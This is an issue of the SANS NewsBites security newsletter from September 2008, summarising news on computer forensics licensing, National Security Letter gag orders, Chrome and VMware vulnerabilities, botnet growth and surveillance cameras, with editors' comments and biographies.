SANS NewsBites is a semiweekly high-level executive summary of the most important news articles that have been published on computer security during the last week. Each news item is very briefly summarized and includes a reference on the web for detailed information, if possible.
Spend five minutes per week to keep up with the high-level perspective of all the latest security news. New issues are delivered free every Tuesday and Friday.
Volume X - Issue #70
September 05, 2008
An especially interesting issue - especially the Top of the News
section. But the story under UPDATES and PATCHES about VMWare
vulnerabilities also deserves a close read. You can use it to help
catalyze your testing of whether your virtual systems are as actively
patched as your operating systems.
TOP OF THE NEWSABA Resoundingly Says No PI Licenses For Computer Forensics
Judges Question Constitutionality of Gag Orders Accompanying National Security Letters
Former Professor Convicted of Arms Export Control Act Violations
UK Consumer Groups Calls on European Commission to Require Companies to Make Data Breaches Public
Researchers Develop Heartbeat-Based Encryption for Implanted Medical Devices
THE REST OF THE WEEK'S NEWSLEGAL ISSUES
Guilty Verdict in Filesharing Case Prompted by Evidence Tampering
Chrome Gets Some Dents
UPDATES AND PATCHES
September's Patch Tuesday Will Include Four Critical Bulletins
VMware Issues Fixes for Multiple Vulnerabilities
STUDIES AND STATISTICS
Zombie Networks Growing
Privacy Notices are Too Complicated
Smart Phones Pose New Challenges for Digital Forensic Investigators
Surveillance Cameras a Boon to Crime Fighting in Newark
*********** Sponsored By SANS SCADA Security Summit *******************
Hear about the most critical vulnerabilities in Control Systems and the findings from the National SCADA Test Bed and Control Systems Security Project from a national laboratory. Also register for Control Systems Cyber Security Training. SANS Process Control and SCADA Summit September 8-9 - Amsterdam, NL. http://www.sans.org/info/32819
- - NETWORK SECURITY 2008: Las Vegas (9/28-10/6) 50 courses; big tools expo; lots of evening sessions: http://www.sans.org/ns2008)
- - Chicago (9/3-9/10) http://www.sans.org/chicago08 AUDIT & COMPLIANCE
- - Monterey (10/31-11/6) http://www.sans.org/info/30738
- - Sydney Australia (10/27-11/1) http://www.sans.org/sydney08/
- - Vancouver (11/17-11/22) http://www.sans.org/vancouver08/
and in 100 other cites and on line any time: www.sans.org
TOP OF THE NEWS
ABA Resoundingly Says No PI Licenses For Computer Forensics (August 28, 2008)At its annual meeting in August, the American Bar Association spoke strongly to the states on the inadvisability of requiring those who perform computer forensics services to obtain a private investigators license.
Judges Question Constitutionality of Gag Orders Accompanying National Security Letters (August 28, 2008)A panel of three judges from the US Second Circuit Court of Appeals heard arguments in a case involving the constitutionality of gag orders that often accompany National Security Letters sent by the FBI. Recipients of the letters, which seek information pertaining to investigations, are prohibited from making their receipt public. The case is before the court because the US government is appealing a lower court ruling that said the gag order violated the constitutional guarantee of free speech. The original case was brought by the American Civil Liberties union (ACLU) on behalf of a small, unnamed internet service provider.
Former Professor Convicted of Arms Export Control Act Violations (September 3 & 4, 2008)University of Tennessee Professor Emeritus J. Reece Roth has been convicted on 18 charges of violating the Arms Export Control Act for sharing restricted technology with students from Iran and China. Roth allowed two graduate assistants access to data about a US Air Force defense project involving "plasma-based guidance systems for the wings of unmanned vehicles." Roth also was accused of taking reports and related studies in his laptop to China during a lecture tour in 2006, and having one report e-mailed to him there through a Chinese professor's Internet connection. He could technically be sentenced to a maximum of 10 years for each of 16 violations and a maximum of five years for the other two, but it is likely he will receive a considerably shorter sentence, "including the possibility of probation."
UK Consumer Groups Calls on European Commission to Require Companies to Make Data Breaches Public (September 2 & 3, 2008)The UK's National Consumer Council (NCC) and other European consumer organizations have called upon the European Commission to introduce a law that would require companies that suffer data security breaches to acknowledge the incidents publicly. The measure's proponents say it would make companies employ stronger security measures to protect customer data. The NCC also wants the UK Information Commissioner's Office to have increased powers, such as imposing fines for negligence related to data security breaches. The ICO has pointed out that determining the appropriate threshold for reporting breaches could be tricky; if every minor incident receives coverage, people could become inured to their presence and stop paying attention.
[Editor's Note (Schultz): The ICO's position is one that would in effect create yet another "big brother" entity, something that would not be in the best interests of individuals who are potential victims of data security breaches. It would give authorities the power to withhold notifications about data security breaches on the grounds that the public could potentially be overwhelmed. Why not instead make all information available, but provide mechanisms that make it possible for individuals to create their own information filters if they so desire? ]
Researchers Develop Heartbeat-Based Encryption for Implanted Medical Devices (September 4, 2008)Researchers from the Chinese University of Hong Kong have developed a method of encrypting implanted medical device signals that uses the patient's own heartbeat pattern as the encryption key. Because of minor fluctuations in people's heartbeats, an attacker could not record a heartbeat and use it at a later date.
************************** SPONSORED LINKS: *****************************
1) Attend the Forensics and Incident Response Summit October 13-14 in Las Vegas to learn about the latest tools and techniques. http://www.sans.org/info/32824
2) Free Content: SANS Analyst Program Whitepaper "Data Leakage Landscape" sponsored by Utimaco & Trend Micro http://www.sans.org/info/32829
3) Search IT security vendors by Defensive Wall categories in the SANS Buyers Guide for INFOSEC Professionals! http://www.sans.org/info/32834
THE REST OF THE WEEK'S NEWS
Guilty Verdict in Filesharing Case Prompted by Evidence Tampering (September 2, 2008)A man in Arizona has been ordered to pay US $40,850 for copyright infringement. Jeffrey Howell had been set to stand trial for placing songs in a shared folder of the Kazaa filesharing program. However, the case will not go to trial because the judge agreed with the plaintiff's request for a verdict on the grounds that the defendant had tampered with and destroyed evidence. Howell formatted his computer's hard disk, ran a data deletion program and reinstalled the operating system even after he had been served the complaint against him.
[Editor's Note (Honan): Use this as impetus to ensure your e-discovery process communicates clearly to all employees what they can and cannot do with the data on their machines once you have been served with an e-discovery notice.]
Chrome Gets Some Dents (September 3, 2008)People have already begun to find vulnerabilities in the beta version of Google Chrome, the company's new web browser. In one scenario involving a flaw in the WebKit engine and another in Java, users could be tricked into downloading executable files. In another scenario, the browser could be crashed when users click on maliciously crafted links. Proof-of-concept code has been posted for both vulnerabilities.
[Editor's Note (Pescatore): Let's see: by my math, if you multiply the security level of consumer-grade software times the security level of beta code, you get a whole mess of vulnerabilities that will be easily exploited. That said, I would love to see more competition in the browser world drive browsers to simpler code bases with more focus on security as the top feature, vs. trying to bundle in email clients and all kinds of other stuff. (Schultz): For a nice, unbiased view of Chrome security, visit
UPDATES AND PATCHES
September's Patch Tuesday Will Include Four Critical Bulletins (September 4, 2008)Microsoft will issue four security bulletins on Tuesday, September 9. The bulletins will address vulnerabilities in Microsoft Windows, Microsoft Office and Windows Media Player and Media Encoder. All four bulletins have been given severity ratings of critical because each will fix at least one remote execution flaw.
VMware Issues Fixes for Multiple Vulnerabilities (September 2, 2008)VMware has issued patches to address at least 16 vulnerabilities in a number of its products, including VMware Workstation, VMware Player, VMware ACE, VMware Server and VMware ESX. The US Computer Emergency Readiness Team (US-CERT) has also issued a warning about the flaws that could be exploited to "execute arbitrary code, cause a denial-of-service condition, access the system with elevated privileges, or obtain sensitive information."
STUDIES AND STATISTICS
Zombie Networks Growing (September 4, 3008)According to statistics gathered by The Shadowserver Foundation, more than 450,000 personal computers are now part of zombie networks; three months ago, the number was just over 100,000. The Shadowserver Foundation believes the increase is due to the rising number of sites that have been manipulated to infect users' machines through SQL injection attacks. While the number of compromised machines is rising, the number of command and control (C&C) servers is falling. The Shadowserver foundation is a group of volunteers from the professional security world.
[Editor's Note (Schultz): Given the statistics released in the past, I suspect that 450,000 bot-infected computers is a gross underestimate. ]
Privacy Notices are Too Complicated (September 4, 2008)Internet Service Providers' (ISP) privacy notices would benefit from simplified language, according to free-lance writer Erik Sherman. Sherman ran the privacy policies of 23 ISPs through three different readability schemes. Of the policies, the simplest is Yahoo's, which requires the equivalent of a high school education; the most complicated, from Insight Communications, requires approximately 21 years of education, the equivalent of five years of graduate school. For the sake of comparison, Time magazine requires a ninth grade (US) reading level and the Atlantic Monthly requires a reading level commensurate with that of a college graduate. Several years ago, the US Securities and Exchange Commission (SEC) required that proxy statements about the compensation packages for executives of publicly held companies be in readable English, or what translates to a ninth-grade education.
Smart Phones Pose New Challenges for Digital Forensic Investigators (September 3, 2008)Keith Foggon, who heads the UK's Serious Fraud Office's digital forensics unit, says that the increased use of mobile devices has created additional problems for those gathering digital forensic evidence. Criminals can remotely wipe out evidence on smart phones. The unit addresses this problem by isolating confiscated devices immediately and not reconnecting them to their networks. However, because of the rapid evolution of mobile devices, tools are not always readily available to help investigators access all the information the devices hold.
[Editors' Note (Schultz and Veltsos): Mr. Foggon's statements seem to indicate that he is not familiar with Paraben Forensics' line of mobile device forensics tools.
Surveillance Cameras a Boon to Crime Fighting in Newark (August 25, 2008)Newark (NJ) Mayor Cory booker has deployed 111 surveillance cameras around the city as part of his goal to drastically reduce the rate of violent crime. The cameras are strategically placed in areas known to experience greater levels of crime. Some privacy advocates have expressed concern with the idea of public surveillance, saying, "The costs are high, and the benefits in terms of law enforcement are low." Newark's program has impressed organizations enough that they are moving facilities into Newark, where the rents are half what they are in nearby Manhattan. Murders in the city are down 40 percent over last year and shootings are down 19 percent. More than 100 arrests have been made based on videotaped evidence. The city has worked with the American Civil Liberties Union (ACLU) to establish parameters to protect citizens' privacy, including not allowing cameras to look inside people's homes and storing the recorded images for no more than 30 days.
[Editor's Comment (Northcutt): We live in an age where criminals pull the wiring out of streetlights to sell the copper to buy drugs, putting citizens at risk. What is done outside, on the streets, is public record and law enforcement has both the right, and arguably, responsibility, to monitor. (Veltsos): Newark with its 111 cameras and 280,000 people (4 cameras per 1,000 people) is a long way from London which boasts 71 cameras per 1,000 people. Interesting debate on CCTV - Panacea or Problem at
The Editorial Board of SANS NewsBites
Eugene Schultz, Ph.D., CISM, CISSP is CTO of High Tower Software and the author/co-author of books on Unix security, Internet security, Windows NT/2000 security, incident response, and intrusion detection and prevention. He was also the co-founder and original project manager of the Department of Energy's Computer Incident Advisory Capability (CIAC).
John Pescastore is Vice President at Gartner Inc.; he has worked in computer and network security since 1978.
Stephen Northcutt founded the GIAC certification and currently serves as President of the SANS Technology Institute, a post graduate level IT Security College, www.sans.edu.
Johannes Ullrich is Chief Technology Officer of the Internet Storm Center.
Howard A. Schmidt served as CSO for Microsoft and eBay and as Vice-Chair of the President's Critical Infrastructure Protection Board.
Ed Skoudis is co-founder of Intelguardians, a security research and consulting firm, and author and lead instructor of the SANS Hacker Exploits and Incident Handling course.
Tom Liston is a Senior Security Consultant and Malware Analyst for Intelguardians, a handler for the SANS Institute's Internet Storm Center, and co-author of the book Counter Hack Reloaded.
Dr. Eric Cole is an instructor, author and fellow with The SANS Institute. He has written five books, including Insider Threat and he is a senior Lockheed Martin Fellow.
Bruce Schneier has authored eight books -- including BEYOND FEAR and SECRETS AND LIES -- and dozens of articles and academic papers. Schneier has regularly appeared on television and radio, has testified before Congress, and is a frequent writer and lecturer on issues surrounding security and privacy.
Mason Brown is one of a very small number of people in the information security field who have held a top management position in a Fortune 50 company (Alcoa). He is leading SANS' global initiative to improve application security.
Marcus J. Ranum built the first firewall for the White House and is widely recognized as a security products designer and industry innovator.
Mark Weatherford, CISSP, CISM, is Executive Officer of the California Office of Information Security and Privacy Protection.
Alan Paller is director of research at the SANS Institute
Clint Kreitner is the founding President and CEO of The Center for Internet Security.
Rohit Dhamankar is the Lead Security Architect at TippingPoint, a division of 3Com, and authors the critical vulnerabilities section of the weekly SANS Institute's @RISK newsletter and is the project manager for the SANS Top20 2005 and the Top 20 Quarterly updates.
Koon Yaw Tan is Assistant Director at Monetary Authority of Singapore (MAS) and a handler for the SANS Institute's Internet Storm Center.
Gal Shpantzer is a trusted advisor to several successful IT outsourcing companies and was involved in multiple SANS projects, such as the E-Warfare course and the Business Continuity Step-by-Step Guide.
Brian Honan is an independent security consultant based in Dublin, Ireland.
Dr. Christophe Veltsos, CISSP, CISA, GCFA teaches Information Security courses at Minnesota State University, Mankato. He is the President of Prudent Security LLC and also serves as the President of the Mankato Chapter ISSA.
Roland Grefer is an independent consultant based in Clearwater, Florida.
Please feel free to share this with interested parties via email, but no posting is allowed on web sites. For a free subscription, (and for free posters) or to update a current subscription, visit http://portal.sans.org/